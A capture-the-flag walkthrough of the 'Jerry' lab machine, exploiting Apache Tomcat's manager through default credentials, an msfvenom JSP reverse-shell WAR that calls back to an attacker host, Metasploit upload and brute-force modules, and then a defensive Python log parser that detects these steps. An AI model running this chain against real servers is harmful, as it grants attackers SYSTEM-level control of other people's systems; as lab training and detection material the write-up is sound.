Let’s scan the IP we have with nmap to enumerate the ports and services.
sudo nmap -sS -sC -sV -oA jerry 10.10.10.95
We have port 8080 open and it’s running Apache Tomcat.
Browsing to port 8080 shows the default Tomcat page. Something we see is: “If you’re seeing this, you’ve successfully installed Tomcat. Congratulations!”. This means it’s probably a fresh install.
Choosing “Server Status”, “Manager App” or “Host Manager” brings up a login popup; if you cancel out of it you are redirected to an error page.
On that page we see the credentials tomcat:s3cret
Logging in to the Manager App with them works.
There is an option to deploy WAR files.
Generate a WAR payload with msfvenom.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.X.X LPORT=9001 -f war > shell.war
Once that’s done you can select your shell and deploy it.
When it’s uploaded you will see it in the list of applications.
Reload it, fire up a netcat listener on the LPORT you chose above (9001) and then navigate to /shell.
You should receive a connection as NT AUTHORITY\SYSTEM.
Navigating to the Administrator folder we see a “flags” directory.
We get two flags at the price of one ¯\_(ツ)_/¯
You can also go through the box with metasploit. Start metasploit.
msfconsole
And search for “tomcat”.
We see the authenticated upload code execution module (exploit/multi/http/tomcat_mgr_upload). Select it and set the options.
I set the HttpPassword, HttpUsername, RHOSTS and RPORT. Run it and you should get a meterpreter shell.
Dropping to a shell from meterpreter, we are running as Administrator.
If you did not try logging in on the manager page to find the credentials, there is a Metasploit module that would have found the username and password: auxiliary/scanner/http/tomcat_mgr_login. Select it and set the options; in this case only the target IP (RHOSTS) is needed.
Running the module tries to brute-force the manager login page, and eventually it finds the password.
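Both of the steps above leave obvious traces in Tomcat's access log: the tomcat_mgr_login scan produces a burst of 401s against /manager, and the WAR deploy is a POST to the manager upload endpoint. As an added defender-side example (my own code, not part of the original writeup), here is a small Python script that parses access-log lines in Tomcat's default common format and flags both. The log lines are constructed samples, and the five-failure threshold and the deploy paths are assumptions.

```python
import re
from collections import Counter

# Tomcat access_log in its default "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Constructed sample (not from the box): five failed manager logins, a
# successful one, a WAR upload through the manager, then the new app is hit.
SAMPLE_LOG = """\
10.10.14.2 - - [02/Jul/2018:10:15:01 +0000] "GET /manager/html HTTP/1.1" 401 2536
10.10.14.2 - - [02/Jul/2018:10:15:02 +0000] "GET /manager/html HTTP/1.1" 401 2536
10.10.14.2 - - [02/Jul/2018:10:15:03 +0000] "GET /manager/html HTTP/1.1" 401 2536
10.10.14.2 - - [02/Jul/2018:10:15:04 +0000] "GET /manager/html HTTP/1.1" 401 2536
10.10.14.2 - - [02/Jul/2018:10:15:05 +0000] "GET /manager/html HTTP/1.1" 401 2536
10.10.14.2 - tomcat [02/Jul/2018:10:15:09 +0000] "GET /manager/html HTTP/1.1" 200 12000
10.10.14.2 - tomcat [02/Jul/2018:10:15:20 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 13500
10.10.14.2 - - [02/Jul/2018:10:15:31 +0000] "GET /shell/ HTTP/1.1" 200 0
192.0.2.7 - - [02/Jul/2018:11:00:00 +0000] "GET / HTTP/1.1" 200 11156
"""

# Assumed values: the manager HTML upload and text-interface deploy paths,
# and how many 401s from one source count as a login attack.
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy")
FAIL_THRESHOLD = 5

def parse(log_text):
    # Yield one dict per line that matches the common log format; skip the rest.
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()

def find_alerts(log_text, fail_threshold=FAIL_THRESHOLD):
    """Return (kind, source_ip, detail) tuples for deploys and login bursts."""
    alerts = []
    failures = Counter()  # 401s against /manager or /host-manager, per source
    for rec in parse(log_text):
        path = rec["path"].split("?", 1)[0]  # drop the CSRF nonce / query string
        if path.startswith(("/manager", "/host-manager")) and rec["status"] == "401":
            failures[rec["ip"]] += 1
        if rec["method"] in ("POST", "PUT") and path.startswith(DEPLOY_PATHS):
            detail = f'{rec["user"]} {rec["method"]} {path} -> {rec["status"]}'
            alerts.append(("war_deploy", rec["ip"], detail))
    for ip, n in failures.items():
        if n >= fail_threshold:
            alerts.append(("manager_bruteforce", ip, f"{n} x 401 on manager"))
    return alerts
```

Pointing it at a real access_log (one line per request, same pattern) is enough to see both the scanner and the deploy from this box; a GET to a freshly deployed context such as /shell/ right after the upload is the follow-on signal.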
That was pretty much it for Jerry. I hope you enjoyed the machine and the writeup. Cya around.